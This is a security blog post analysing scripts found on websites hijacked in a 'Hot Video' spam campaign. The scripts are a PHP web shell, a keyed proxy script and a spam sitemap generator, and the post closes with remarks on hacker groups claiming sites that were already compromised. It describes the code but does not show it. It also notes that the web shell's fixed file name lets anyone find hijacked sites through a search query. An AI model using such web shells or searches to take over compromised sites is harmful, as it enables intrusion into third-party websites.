By: Julien Sobrier

"Hot Video" Pages: Analysis Of An Hijacked Site (Part IV)

Uncategorised

In Part I and II, I analyzed files on a hijacked web site that was part of the malicious "Hot Video" campaign. While doing the analysis, I looked at other hijacked domains. All these domains had one of the malicious files described in Part II which allows anyone to execute commands or upload files. Some of these files are variations of the "Hot Video" pages, other are unrelated to the attack.

Here are some of the more interesting scripts I found.

PHP Shell

Using PHP or shell commands through HTTP requests might still be too much work for some people! More than a few hijacked sites had a PHP shell script installed, which makes it easier to connect to the database, see the source code of any script, upload or modify files, etc.
 

Powerful PHP shell

Because the file name of this PHP shell is always the same, it is even easier to find such hijacked sites with a single Google query.


proxy.php

As its name suggests, this script acts as a proxy. It might be used by spam sites to access the Google Hot Trends without being detected and blacklisted. This script can only be used by people who know a special "key" which cannot be directly derived from the source code, like in the file .sys.php analyzed earlier.

 

PHP code of proxy.php
 

sitemap.php

All the hijacked sites contain a Sitemap, a file which shows the list of spam pages on the same domain and other domains. They are usually created by the same script which shows the "Hot Video" page (see Part III). But on a few sites, there is a separate sitemap.php file to create this list.

The script uses the list of keywords for key.txt, and the list of sites from sites.txt to generate a list of spam pages.

 

 

PHP code of sitemap.php

 

 

 

 


Script kiddies?

There shouldn't be too much pride in hacking a site which is already already. But some groups claimed have "owned" a few sites which they did not hack in the first place.

 

 

 

Hacker group claim to have "onwed a site already hacked

 

 

 


Conclusion

The most scary part of this analysis is that these websites remain vulnerable after months of being hijacked. Maybe their owner doesn't care about these sites, but they can be used to infect users at any time. Anybody with the knowledge of the right Google query can control hundreds of websites within a few minutes.


-- Julien

Learn more about Zscaler.